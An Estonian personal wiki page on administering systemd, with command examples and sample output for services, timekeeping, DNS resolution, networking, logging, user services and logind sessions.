Imre kasutab arvutit - Kasutaja kaastöö [et]

Systemd kasutamine

2026-05-05T07:07:08Z

Imre: /* Ubuntu */

===Sissejuhatus===

systemd http://freedesktop.org/wiki/Software/systemd/ ...

Tundub, et 2014 aasta lõpus on Debian v. 8 Jessie koosseisus vaikimisi systemd

# ls -ld /sbin/init
lrwxrwxrwx 1 root root 20 Sep 28 22:33 /sbin/init -> /lib/systemd/systemd

===Tööpõhimõte===

* Turvalisus ja tegevuste isoleerimine failisüsteemi ja võrgu tasemel, http://0pointer.de/blog/projects/security.html
* SysV käivitusskripti on imperatiivsed, st shell skriptid praktiliselt, systemd nö käivitusskriptid on deklaratiivsed, st nn .ini failidele sarnase sisuga

===Paigaldamine===

Tundub, et minimaalsele keskkonnale (nt debootstrap abil moodustatud) tuleb juurde lisada dbus ja polkit tugi, vastasel korral nt systemd-cgls programm ei tööta)

# apt-get install dbus libpolkit-agent-1-0

===Kasutamine===

Teenuse oleku küsimiseks sobib öelda

# systemctl status ssh.service
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/lib/systemd/system/ssh.service; enabled)
Active: active (running) since Tue 2014-11-04 02:43:10 EET; 18h ago
Main PID: 1956 (sshd)
CGroup: /system.slice/ssh.service
└─1956 /usr/sbin/sshd -D

kus

# cat /lib/systemd/system/ssh.service
[Unit]
Description=OpenBSD Secure Shell server
After=network.target auditd.service
ConditionPathExists=!/etc/ssh/sshd_not_to_be_run

[Service]
EnvironmentFile=-/etc/default/ssh
ExecStart=/usr/sbin/sshd -D $SSHD_OPTS
ExecReload=/bin/kill -HUP $MAINPID
KillMode=process
Restart=on-failure

[Install]
WantedBy=multi-user.target
Alias=sshd.service

Teenuste nimekirja esitamiseks

# systemctl list-units --type=service | head -n 5
UNIT LOAD ACTIVE SUB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active exited LSB: Start the Advanced Configuration and Power Interface daemon
amavis-mc.service loaded active exited LSB: Startup script for amavis master supervisor
amavis.service loaded active running LSB: Starts amavisd-new mailfilter

Tundub, et teenus saab olla mitmes olekus, üks variant teenuseid on sellised, mis arvuti käivitamisel nö korraks töötavad midagi sisse lülitades ja siis teevad exit, nt

# systemctl list-units --type=service --state=exited
UNIT LOAD ACTIVE SUB DESCRIPTION
getty-static.service loaded active exited getty on tty2-tty6 if dbus and logind are not available
kbd.service loaded active exited LSB: Prepare console
keymap.service loaded active exited LSB: Set keymap
modules_dep.service loaded active exited LSB: modules.dep creation.
netfilter-persistent.service loaded active exited netfilter persistent configuration
networking.service loaded active exited LSB: Raise network interfaces.
quota.service loaded active exited Check And Enable File System Quotas
rc-local.service loaded active exited /etc/rc.local Compatibility
systemd-random-seed.service loaded active exited Load/Save Random Seed

===systemd-timedated===

timedatectl programmiga saab seadistada ajavööndit jms

# timedatectl list-timezones
# timedatectl set-timezone Europe/Tallinn

systemd-timedated on ntp klient, mis tuleb kasutamiseks sisse lülitada

# timedatectl set-ntp true

Tundub, et samaväärne on öelda

# systemctl enable systemd-timesyncd
# systemctl start systemd-timesyncd

Töötamissel annab timedatactl saranase vastuse

# timedatectl status
Local time: Fri 2015-07-31 01:21:26 EEST
Universal time: Thu 2015-07-30 22:21:26 UTC
RTC time: Thu 2015-07-30 22:21:26
Time zone: Europe/Tallinn (EEST, +0300)
NTP enabled: yes
NTP synchronized: no
RTC in local TZ: no
DST active: yes
Last DST change: DST began at
Sun 2015-03-29 02:59:59 EET
Sun 2015-03-29 04:00:00 EEST
Next DST change: DST ends (the clock jumps one hour backwards) at
Sun 2015-10-25 03:59:59 EEST
Sun 2015-10-25 03:00:00 EET

kus

* valitud ajavööndi Daylight Saving Time algus ja lõpp
* kas NTP teenust töötab (systemd-timesyncd)

Spetsiifilise NTP serveri kasutamiseks sobib näidata ta seadistusfailis /etc/systemd/timesyncd.conf

# cat /etc/systemd/timesyncd.conf
[Time]
Servers=10.192.0.53

ja muudatuse kehtestamiseks öelda

# systemctl restart systemd-timesyncd

Tulemusena

# systemctl status systemd-timesyncd
● systemd-timesyncd.service - Network Time Synchronization
Loaded: loaded (/lib/systemd/system/systemd-timesyncd.service; enabled)
Active: active (running) since Fri 2015-07-31 09:13:18 EEST; 1min 43s ago
Docs: man:systemd-timesyncd.service(8)
Main PID: 1179 (systemd-timesyn)
Status: "Using Time Server 10.192.0.53:123 (10.192.0.53)."
CGroup: /system.slice/systemd-timesyncd.service
└─1179 /lib/systemd/systemd-timesyncd

Jul 31 09:13:17 postkast systemd-timesyncd[1179]: Using NTP server 10.192.0.53:123 (10.192.0.53).
Jul 31 09:13:18 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 32s/+0.621s/0.000s/0.000s/+0ppm
Jul 31 09:13:50 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 64s/+0.000s/0.000s/0.000s/+0ppm
Jul 31 09:14:54 postkast systemd-timesyncd[1179]: interval/delta/delay/jitter/drift 128s/-0.000s/0.000s/0.000s/+0ppm

Taustal tegutseb lisaks systemd-timedated deemon, mis on static, st teda kutsutakse automaatselt vajadusel välja, st käivitatakse

# systemctl status systemd-timedated
● systemd-timedated.service - Time & Date Service
Loaded: loaded (/lib/systemd/system/systemd-timedated.service; static)
Active: inactive (dead)
Docs: man:systemd-timedated.service(8)
man:localtime(5)
http://www.freedesktop.org/wiki/Software/systemd/timedated

===Rakenduste kasutamine systemd keskkonnas===

====PostgreSQL kasutamine====

Mitme PostgreSQL protsesside komplekti kasutamiseks sobib esmalt järgmise eksemplari osa failisüsteemis ettevalmistada nö tavalisel viisil

# pg_createcluster 9.4 test

ning käivitada

# systemctl start postgresql@9.4-test

Mitme PostgreSQL protsesside komplekti kasutamine paistab sedasi

# ps -U postgres -o pid,user,cgroup:150,args
PID USER CGROUP COMMAND
10064 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service /usr/lib/postgresql/9.4/bin/postgres -D /va ...
10070 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: checkpointer process
10072 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: writer process
10074 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: wal writer process
10076 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: autovacuum launcher process
10078 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-main.service postgres: stats collector process

10331 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service /usr/lib/postgresql/9.4/bin/postgres -D /var ...
10333 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: checkpointer process
10334 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: writer process
10335 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: wal writer process
10336 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: autovacuum launcher process
10337 postgres 8:devices:/system.slice/system-postgresql.slice ... /postgresql@9.4-test.service postgres: stats collector process

kus

* erinevate PostgreSQL protsessi kompilektide protsessid on sama süsteemi kasutaja postgres omad, aga kuuluvad erinevatesse kerneli CGROUP'idesse

Tapmiseks nö -9 signaaliga

# systemctl kill -s SIGKILL postgresql@9.4-test.service

====Samba====

Teenuste seiskamine

# systemctl stop smbd
# systemctl stop nmbd

kontrolliks

# ps aux | grep mb

AD kasutamiseks

# systemctl start samba-ad-dc

====OpenVPN====

Kui OpenVPN kliendi seadisus asub failis /etc/openvpn/client.conf, siis käivitamiseks sobib öelda

# systemctl start openvpn@client.service

====Serial konsool====

Serial konsooli käivitamiseks sobib öelda

# systemctl enable serial-getty@ttyS0.service
Created symlink from /etc/systemd/system/getty.target.wants/serial-getty@ttyS0.service \
to /lib/systemd/system/serial-getty@.service.

# systemctl start serial-getty@ttyS0.service

Tulemusena saab ipmitool, cu, minicom jt programmide abil pöörduda serial konsooli poole.

====NUT====

Tundub, et töötab, nt

# systemctl status nut-server
# systemctl status nut-client

====iptables====

Kasulikud lisamaterjalid

* http://www.auul.pri.ee/wiki/Iptables_kasutamine_Debianiga#iptables-persistant

====rsyslog====

Peatamiseks

# systemctl stop syslog.socket rsyslog.service

vastasel korral tuleb sõnum sisse ja rsyslog teenus käivitatakse automaatselt.

====Varnish====

Kuulava pordi muutmine failis

# grep ^ExecS /lib/systemd/system/varnish.service
ExecStart=/usr/sbin/varnishd -j unix,user=vcache -F -a :80 -T localhost:6082 -f /etc/varnish/default.vcl -S /etc/varnish/secret -s malloc,256m

Logimisel X-Forwarded-For kasutamiseks

# grep ^ExecS /lib/systemd/system/varnishncsa.service
ExecStart=/usr/bin/varnishncsa -F '%%{X-Forwarded-For}i %%l %%u %%t \"%%r\" %%s %%b \"%%{Referer}i\" \"%%{User-agent}i\"' -a -w /var/log/varnish/varnishncsa.log

Muudatuste kehtestamiseks

# systemctl daemon-reload
# /etc/init.d/varnishncsa restart
# /etc/init.d/varnish restart

Logis on näha X-Forwarded-For päisest tulnud aadress ning tcp ühenduse teise otspunkti aadress

<pre>
# tail -f /var/log/varnish/varnishncsa.log
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
10.204.62.115, 10.184.39.42 - - [02/Oct/2017:17:20:24 +0300] "GET http://www.moraal.ee/ HTTP/1.1" 200 612 "-" "Wget/1.17.1 (linux-gnu)"
...
</pre>

===Logimine===

Systemd sisaldab logimise komponenti journald.

====Süsteemi alglaadimine====

Logimise haldusutiliit näitab vaikimisi kogu kogutud logi alates viimasest alglaadimisest, vanemad sissekanded eespool

# journalctl
-- Logs begin at Mon 2015-07-27 23:03:45 EEST, end at Tue 2015-07-28 08:41:14 EEST. --
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd systemd-journal[171]: Runtime journal is using 4.0M (max allowed 9.3M, trying to leave 14.0M free of 89.7M available → current limit 9.3M).
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuset
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpu
Jul 27 23:03:45 systemd kernel: Initializing cgroup subsys cpuacct
Jul 27 23:03:45 systemd kernel: Linux version 4.0.0-2-amd64 (debian-kernel@lists.debian.org) (gcc version 4.9.3 (Debian 4.9.3-2) ) #1 SMP Debian 4.0.8-2 (2015-07-22)
Jul 27 23:03:45 systemd kernel: Command line: BOOT_IMAGE=/vmlinuz-4.0.0-2-amd64 root=/dev/mapper/systemd-root ro console=ttyS0,9600
...

journald töötamisest annab tunnistust protsess

# ps aux | grep journald
..
root 172 0.1 1.0 35112 5208 ? Ss 08:55 0:00 /lib/systemd/systemd-journald

====Märkused====

Tundub, et vahel võib The Journal seisma jääda (nt saab failisüsteem täis vms), see paistab sedasi ja midagi ei logita (nt logger protsessiga)

Mar 28 03:37:01 keskus systemd-journal[29787]: Journal stopped
-- Subject: The Journal has been stopped
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel

Käivitamiseks

# systemctl start systemd-journald

# journalctl -xn
...
May 19 02:36:01 keskus systemd[1]: Starting Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Started Session 81008 of user root.
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket (/dev/log).
May 19 02:36:01 keskus systemd[1]: Starting Journal Socket.
May 19 02:36:01 keskus systemd[1]: Listening on Journal Socket.
May 19 02:36:01 keskus systemd[1]: Starting Journal Service...
May 19 02:36:01 keskus systemd[1]: Started Journal Service.
May 19 02:36:01 keskus systemd-journal[32447]: Journal started
-- Subject: The Journal has been started
-- Defined-By: systemd
-- Support: http://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- The system journal process has been starting up, opened the journal
-- files for writing and is now ready to process requests.

====Apache veebiserver====

Kui Apache seadistusfailis on viga, siis see paistab journald juurest välja selline

# journalctl -u apache2
..
Jul 28 09:11:31 systemd systemd[1]: Starting LSB: Apache2 web server...
Jul 28 09:11:31 systemd apache2[2491]: Starting web server: apache2 failed!
Jul 28 09:11:31 systemd apache2[2491]: The apache2 configtest failed. ... (warning).
Jul 28 09:11:31 systemd apache2[2491]: Output of config test was:
Jul 28 09:11:31 systemd apache2[2491]: AH00526: Syntax error on line 1 of /etc/apache2/sites-enabled/000-default.conf:
Jul 28 09:11:31 systemd apache2[2491]: <VirtualHost> directive missing closing '>'
Jul 28 09:11:31 systemd apache2[2491]: Action 'configtest' failed.
Jul 28 09:11:31 systemd apache2[2491]: The Apache error log may have more information.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Control process exited, code=exited status=1
Jul 28 09:11:31 systemd systemd[1]: Failed to start LSB: Apache2 web server.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Unit entered failed state.
Jul 28 09:11:31 systemd systemd[1]: apache2.service: Failed with result 'exit-code'.

kus

* journald tegeleb apache2 protsessidega seotud nö süsteemse logiga, mitte http päringute logimisega

====Kasulikud lisamaterjalid====

* https://www.digitalocean.com/community/tutorials/how-to-use-journalctl-to-view-and-manipulate-systemd-logs
* http://0pointer.de/blog/projects/journalctl.html

===targetite vahel liikumine===

Nö init=/bin/bash keskkonda liikumiseks tuleb kasutada bootloaderis tuuma real parameetrit

systemd.unit=emergency.target

tulemusena jõutakse (arvuti hostname on antud juhul systemd)

..
Welcome to Debian GNU/Linux stretch/sid!

[260222.496889] systemd[1]: Set hostname to <systemd>.
[ OK ] Created slice Root Slice.
[260223.089638] systemd[1]: Created slice Root Slice.
[260223.096748] systemd[1]: Starting Root Slice.
[ OK ] Created slice System Slice.
[260223.109289] systemd[1]: Created slice System Slice.
[260223.115005] systemd[1]: Starting System Slice.
[ OK ] Started Emergency Shell.
[260223.134133] systemd[1]: Started Emergency Shell.
[260223.146296] systemd[1]: Starting Emergency Shell...
Starting Emergency Shell...
[ OK ] Reached target Emergency Mode.
[260223.192047] systemd[1]: Reached target Emergency Mode.
[260223.205684] systemd[1]: Startup finished in 3.658s (kernel) + 967ms (userspace) = 4.626s.
[260223.221455] systemd[1]: Starting Emergency Mode.
[260223.232336] systemd[157]: emergency.service: Failed at step EXEC spawning /bin/plymouth: No such file or directory
Welcome to emergency mode! After logging in, type "journalctl -xb" to view
system logs, "systemctl reboot" to reboot, "systemctl default" or ^D to
try again to boot into default mode.
Give root password for maintenance
(or press Control-D to continue): <root parool>
root@systemd:~#

Tavalisse nn multi-user režiimi jõudmiseks sobib öelda seejärel

# systemctl isolate multi-user.target

Arvuti väljalülitamiseks sh toitest

# systemctl poweroff

===systemd-socket-proxyd===

systemd-ocket-proxyd võimaldab käivitada teenuse selle poole pöördumisel. Nt nginx protsessid käivitatakse port 80 poole pöördumisel. Selleks tuleb

* seadistada nginx server kuulama port 8080

# cat /etc/nginx/sites-available/default
..
server {
listen 8080 default_server;
...

* tekitada .service tüüpi unit (erinevalt man systemd-socket-proxyd soovitusest on JoinsNamespaceOf ja PrivateNetwork välja kommenteeritud ja lülitatud)

# cat /etc/systemd/system/proxy-to-nginx.service
[Unit]
Rquires=nginx.service
After=nginx.service
# JoinsNamespaceOf=nginx.service

[Service]
ExecStart=/lib/systemd/systemd-socket-proxyd 127.0.0.1:8080
PrivateTmp=yes
PrivateNetwork=no

* tekitada .socket tüüpi unit

# cat /etc/systemd/system/proxy-to-nginx.socket
[Socket]
ListenStream=80

[Install]
WantedBy=sockets.target

Seejärel tuleb sisse lülitada ja käivitada socket unit (nginx ise ega proxy-to-nginx.service ei pea töötama)

# systemctl enable proxy-to-nginx.socket
# systemctl start proxy-to-nginx.socket

Tulemusena pöördudes aadressile http://127.0.0.1:80/ käivitatakse .service ja nginx protsessid.

Kasulikud lisamaterjalid

* https://developer.atlassian.com/blog/2015/03/docker-systemd-socket-activation/
* man systemd-socket-proxyd

===systemd-resolved===

Paigaldada pakett libnss-resolve

# apt-get install libnss-resolve

Kirjeldada meelepärane nö ISP nimeserver

# cat /etc/systemd/resolved.conf

[Resolve]
DNS=10.192.0.53

Lülitada sisse systemd-resolved

# systemctl start systemd-resolved
# systemctl enable systemd-resolved

Testida systemd-resolved rekursiivse nimeserveri töötamist

# /lib/systemd/systemd-resolve-host kuutorvaja.eenet.ee
kuutorvaja.eenet.ee: 193.40.0.7

-- Information acquired via protocol DNS in 157.3ms.

Kustutada fail /etc/resolv.conf

# rm /etc/resolv.conf

Kasutada failis /etc/nsswitch.conf rida

hosts: files resolve dns

Soovi korral

# ln -fs /run/systemd/resolve/resolv.conf /etc/resolv.conf

Debugi sisselülitamine

# cp /lib/systemd/system/systemd-resolved.service /etc/systemd/system

kus on sektsioonis Service lisatud debug

[Service]

..
Environment=SYSTEMD_LOG_LEVEL=debug

dns cache jms logisse kirjutamiseks

# kill -SIGUSR1 PID

Tulemuse esitamine

# systemd-resolve --status

Logi jälgimine

# journalctl -f -u systemd-resolved

===localectl===

# localectl list-locales
C.UTF-8
en_US.utf8

===Service haldamine===

Käivitamine

# systemctl start apache2

Oleku küsimine

# systemctl status apache2

Seiskamine

# systemctl stop apache2

Väljalülitamine, st selliselt seadistatud teenust ei käivitata automaatselt (süsteemi alglaadimisel, mingi event esinemisel vms), aga käsitsi start abil saab käivitada

# systemctl disable apache2

Sisselülitamiseks

# systemctl enable apache2

Maskeerimine, selliselt seadistatud teenust ei saa üldse käivitada

# systemctl mask apache2

Maskeerimise väljalülitamiseks

# systemctl unmask apache2

Kõigi service'ite nimekirja küsimine (töötavate küsimiseks jätta -a ära; sarnaselt saab küsida target, socket, mount)

# systemctl list-units --type service -a

Kõigi failide nimekirja küsimine

# systemctl list-unit-files --type=service

systemd seadistustes tehtud muudatuste esitamine

# systemd-delta

Sõltuvuste nimekirja esitamine

# systemctl list-dependencies sshd.service

Teenuse omaduste esitamiseks

# systemctl show sshd.service

Unitite seadistusfailidega töötamiseks sobib öelda (vastavalt redigeeritakse /etc/systemd/system/nginx.service, /etc/systemd/system/nginx.service.d/failinimi või esitatakse faili sisu)

# systemctl edit --full nginx.service
# systemctl edit nginx.service
# systemctl cat nginx.service

===systemd-networkd===

systemd-networkd tegeleb võrgu seadistamisega. Nt nspawn konteinerile saab võrgu seadistada selliselt

* seadistada konteinerit hostiva arvuti võrguühendus nt bridge-utils bridge abil

* tekitada konteinerisse seadistusfail (kui arvutis on mitu võrguliidest, siis võiks iga liidese jaoks olla oma fail)

# cat /etc/systemd/network/50-static.network
[Match]
Name=host0

[Network]
Address=192.168.10.16/24
Gateway=192.168.10.254

* /etc/network/interfaces failis kirjeldada vaid lo seade

# cat /etc/network/interfaces
source /etc/network/interfaces.d/*
auto lo
iface lo inet loopback

* võrgu käivitamiseks öelda

# systemctl start systemd-networkd

* ipv4 ja ipv6 aadressi seadistamiseks

..
[Network]
Gateway=192.168.10.254

[Address]
Address=192.168.10.16/24

[Address]
Address=110:1/64

===Konsooli alglaadimisjärgse puhastamise lõpetamine===

Järgneva töötamise eelduseks on /etc/default/grub failis "quiet" eemaldamine, vt man systemd -> ShowStatus 'Defaults to enabled, unless quiet is passed as kernel command line option, in which case it defaults to error.' Alternatiiv on kasutada kernel argumenti 'systemd.show_status=1'.

Viisakas variant

<pre>
# systemctl edit getty@tty1
..

[Service]
TTYVTDisallocate=no

...
</pre>

Vulgaarsem variant

# mkdir /etc/systemd/system/getty@tty1.service.d
# cat /etc/systemd/system/getty@tty1.service.d/noclear.conf
[Service]
TTYVTDisallocate=no

Ja järgmisel alglaadimisel enam ekraani ei puhastata

# reboot

NB! Selleks, et tuuma teateid oleks näha tuleb lisaks GRUB2 seadistusfailis kasutada rida

# cat /etc/default/grub
..
GRUB_CMDLINE_LINUX_DEFAULT=""
...

ning öelda

# update-grub

Kasulikud lisamaterjalid

* http://mywiki.wooledge.org/SystemdNoClear
* https://wiki.archlinux.org/index.php/Systemd_FAQ

===journalctl kasuamine===

Bootimisest alates antud logi sissekannete esitamiseks sobib öelda

# journalctl -b

Selleks, et näha erinevate bootimiskordade logi tuleb öelda

# mkdir /var/log/journal
# sed -ri s/^#Storage=auto/Storage=persistent/ /etc/systemd/journald.conf

tulemusena saab nimekirja vaadata

# journalctl --list-boots

ning konkreetse korra sissekandeid nt

# journalctl -b -2

Uniti vms logi follow režiimis esitamiseks

# journalctl -n 20 -f -u ssh

===Systemd debugimine===

TODO

Kasulikud lisamaterjalid

* http://freedesktop.org/wiki/Software/systemd/Debugging/

===Ressursikasutuse kontrollimine===

# grep -v "^#" /etc/systemd/system.conf

[Manager]
DefaultCPUAccounting=yes
DefaultBlockIOAccounting=yes
DefaultMemoryAccounting=yes

# systemctl set-property nginx.service MemoryLimit=10M

===systemd-run===

$ systemd-run --user --unit=limit-test.scope --scope -p MemoryAccounting=yes -p MemoryLimit=2M bash

$ systemctl show --user limit-test.scope | grep Mem
MemoryAccounting=yes
MemoryLimit=2M

või

<pre>
root@ph-minio-01:~# systemd-run --user --scope -p MemoryMax=10M -p MemorySwapMax=0 bash
Running as unit: run-p10909-i11209.scope; invocation ID: d3b7a7cc8af2431282ac1e1e7d469e2a

root@ph-minio-01:~# python3 -c 'a = "x" * 20 * 1024 * 1024'
Killed

root@ph-minio-01:~#
</pre>

===systemd-boot===

TODO

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/systemd-boot

===systemd-logind===

====Mõisted====

* seat
* session

====Tööpõhimõte====

Kasutaja sisselomisel moodustatakse nö sessioon

* '$ systemd --user ..' - käivitatakse per kasutaja systemd lahendus (seejuurde kuulub systemd-user service'ite käivitamine)
* '$ busctl lis') - per kasutaja dbus käivitamine (busctl list)
* '$ lsns' - moodustatakse per kasutaja namespace'ide komplekt (user, mount, pid jne)
* 'man pam_systemd' - pam kaudu kutsutakse välja kasutajapõhine systemd lahendus

nn linger abil saab kasutaja sessiooni tekitada automaatselt süsteemi algkäivituse käigus

<pre>

</pre>

====Misc====

systemd-logind asendab ConsoleKit lahenduse. nt saab küsida

<pre>
# loginctl list-sessions
SESSION UID USER SEAT TTY
31 0 root seat0 /dev/tty2
189 1001 priit seat0 /dev/tty4
2 1000 imre seat0
c5 111 lightdm seat0
187 1001 priit seat0 /dev/tty3
33 1000 imre seat0

6 sessions listed.
</pre>

Arvuti sees root kasutajana tavakasutaja service nimekirja küsimine

<pre>
root@ph-minio-01:~# systemctl --user -M kasutaja@.host list-units --type=service
UNIT LOAD ACTIVE SUB DESCRIPTION
dbus.service loaded active running D-Bus User Message Bus
nginx-08.service loaded active running My Nginx Quadlet Service
nginx-09.service loaded active running My Nginx 09 Quadlet Service
...
</pre>

kasutaja status küsimine

<pre>
kasutaja@ph-minio-01:~$ loginctl user-status
kasutaja (1000)
Since: Sun 2026-04-19 18:59:50 EEST; 1h 15min ago
State: active
Sessions: *69 68
Linger: no
Unit: user-1000.slice
├─session-69.scope
│ ├─3556 "sshd-session: kasutaja [priv]"
│ ├─3563 "sshd-session: kasutaja@pts/1"
│ ├─3564 -bash
│ ├─3883 loginctl user-status
│ └─3884 pager
...
</pre>

kus

* linger info - no

Kasulikud lisamaterjalid

* https://yakking.branchable.com/posts/systemd-4-logind/

===systemd system service===

TODO

===systemd user service===

Kui tavaliselt on kasutusel systemd põhises keskkonnas nn süsteemne systemd halduse lahendus, mis tegeleb teenus-protsessidega, siis systemd user service on selline asjakorraldus, kus sarnane tulemus saavutatakse tavakasutaja tingimustes. Üks võimalik lähtepunkt on, et süsteemi on tavakasutaja abil sisse logitud üle ssh ühes aknas

<pre>
root@pwrk-02:~# ps U priit
20185 ? Ss 0:00 /usr/lib/systemd/systemd --user
20187 ? S 0:00 (sd-pam)
20201 ? S 0:00 sshd-session: priit@pts/0
20202 pts/0 Ss 0:00 -bash
</pre>

kus

* sellega kaasneb kasutaja-põhise systemd protsessi töötamine

ja teises aknas asutakse tegutsema

<pre>
root@pwrk-02:~# su - priit
priit@pwrk-02:~$ export XDG_RUNTIME_DIR=/run/user/1002
</pre>

kus

* systemctl --user ... leiab selle XDG kataloogi suhtes standardsest asukohast systemd user soketi (/run/user/1002/systemd/private)

systemd user service ehk kasutaja-põhine teenus paistab välja selline

<pre>
priit@pwrk-02:~$ systemctl --user list-units | grep http
bash-http-server.service loaded active running Bash Netcat HTTP Microservice

priit@pwrk-02:~$ systemctl --user status bash-http-server.service
● bash-http-server.service - Bash Netcat HTTP Microservice
Loaded: loaded (/home/priit/.config/systemd/user/bash-http-server.service; enabled; preset: enabled)
Active: active (running) since Sun 2025-10-12 20:39:01 UTC; 21min ago
Main PID: 910 (bash-http-serve)
Tasks: 2 (limit: 9410)
Memory: 704.0K (peak: 1.4M)
CPU: 5ms
CGroup: /user.slice/user-1002.slice/user@1002.service/app.slice/bash-http-server.service
├─910 /bin/bash /home/priit/bin/bash-http-server
└─913 nc -l -p 5100 -q 1

Oct 12 20:39:01 pwrk-02 systemd[869]: Started bash-http-server.service - Bash Netcat HTTP Microservice.

priit@pwrk-02:~$ curl http://127.0.0.1:5100
<h1>Hello from the Bash Server Service!</h1><p>Running as user: priit</p>
</pre>

vastavad protsessid

<pre>
root@pwrk-02:~# ps U priit
PID TTY STAT TIME COMMAND
885 ? Ss 0:00 /usr/lib/systemd/systemd --user
889 ? S 0:00 (sd-pam)
923 ? Ss 0:00 /bin/bash /home/priit/bin/bash-http-server
929 ? S 0:00 nc -l -p 5100 -q 1
</pre>

kus

* haldav protsess (systemd --user) töötab sama kasutajana nagu hallatav protsess (bash-http-server ja nc) - võib olla ei ole see parim isolatsioon

programmi on selline

<pre>
priit@pwrk-02:~$ cat /home/priit/bin/bash-http-server
#!/bin/bash
# A simple, single-page HTTP server using Netcat

# Port to listen on (high port recommended for unprivileged user)
LISTEN_PORT=5100

# The HTTP response content
HTTP_CONTENT="<h1>Hello from the Bash Server Service!</h1><p>Running as user: $(whoami)</p>"

# HTTP headers
HTTP_RESPONSE="HTTP/1.1 200 OK\r\n"
HTTP_RESPONSE+="Content-Type: text/html\r\n"
HTTP_RESPONSE+="Content-Length: ${#HTTP_CONTENT}\r\n"
HTTP_RESPONSE+="\r\n"
HTTP_RESPONSE+="${HTTP_CONTENT}"

# Loop forever, listening for connections and serving the response
while true; do
# Use netcat to listen on the port, process one request, and close.
# The 'echo' ensures the response is sent back.
printf "%b" "$HTTP_RESPONSE" | nc -l -p $LISTEN_PORT -q 1
done

priit@pwrk-02:~$ chmod 0755 /home/priit/bin/bash-http-server
</pre>

kasutaja-põhine systemd unit service

<pre>
priit@pwrk-02:~$ mkdir -p .config/systemd/user
priit@pwrk-02:~$ cat .config/systemd/user/bash-http-server.service
[Unit]
Description=Bash Netcat HTTP Microservice

After=network-online.target
Wants=network-online.target

[Service]
ExecStart=/home/priit/bin/bash-http-server
Restart=always
RestartSec=5s

[Install]
# This is typically the correct target for persistent user services
WantedBy=default.target
</pre>

Lülitatakse sisse kasutaja nö lingerdamine

<pre>
imre@pwrk-02:~$ loginctl enable-linger priit
</pre>

loetakse sisse systemd seadistuse muudatused

<pre>
priit@pwrk-02:~$ systemctl --user daemon-reload
</pre>

ning aktiveeritakse teenus + käivitatakse

<pre>
priit@pwrk-02:~$ systemctl --user enable --now bash-http-server.service
</pre>

Ootus on, et tulemusena käib teenus, nagu lõigu alguses on esitatud.

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Systemd/User
* https://unix.stackexchange.com/questions/251211/why-doesnt-my-systemd-user-unit-start-at-boot
* https://www.brendanlong.com/systemd-user-services-are-amazing.html

===journald user logs===

TODO

===tmpfiles-setup===

tmpfiles-setup haldab programmide ajutiste jms failide jaoks kataloogide olemasolu eest

<pre>
# ls -ld /usr/lib/tmpfiles.d/*
-rw-r--r-- 1 root root 238 Dec 2 2015 /usr/lib/tmpfiles.d/00rsyslog.conf
-rw-r--r-- 1 root root 153 Dec 2 2015 /usr/lib/tmpfiles.d/dbus.conf
-rw-r--r-- 1 root root 577 Jul 5 16:56 /usr/lib/tmpfiles.d/debian.conf
-rw-r--r-- 1 root root 362 Jul 19 02:56 /usr/lib/tmpfiles.d/home.conf
-rw-r--r-- 1 root root 1098 Jul 19 02:56 /usr/lib/tmpfiles.d/journal-nocow.conf
-rw-r--r-- 1 root root 812 Jul 19 02:56 /usr/lib/tmpfiles.d/legacy.conf
-rw-r--r-- 1 root root 61 Apr 16 2016 /usr/lib/tmpfiles.d/lvm2.conf
-rw-r--r-- 1 root root 239 Feb 5 2016 /usr/lib/tmpfiles.d/passwd.conf
-rw-r--r-- 1 root root 176 Feb 21 2016 /usr/lib/tmpfiles.d/postgresql.conf
-rw-r--r-- 1 root root 33 Jun 9 2015 /usr/lib/tmpfiles.d/screen-cleanup.conf
-rw-r--r-- 1 root root 31 Mar 16 2017 /usr/lib/tmpfiles.d/sshd.conf
-rw-r--r-- 1 root root 313 Jul 4 10:37 /usr/lib/tmpfiles.d/sudo.conf
-rw-r--r-- 1 root root 1544 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd.conf
-rw-r--r-- 1 root root 496 Jul 19 02:56 /usr/lib/tmpfiles.d/systemd-nologin.conf
-rw-r--r-- 1 root root 637 Jul 19 02:56 /usr/lib/tmpfiles.d/tmp.conf
-rw-r--r-- 1 root root 532 Jul 19 02:56 /usr/lib/tmpfiles.d/var.conf
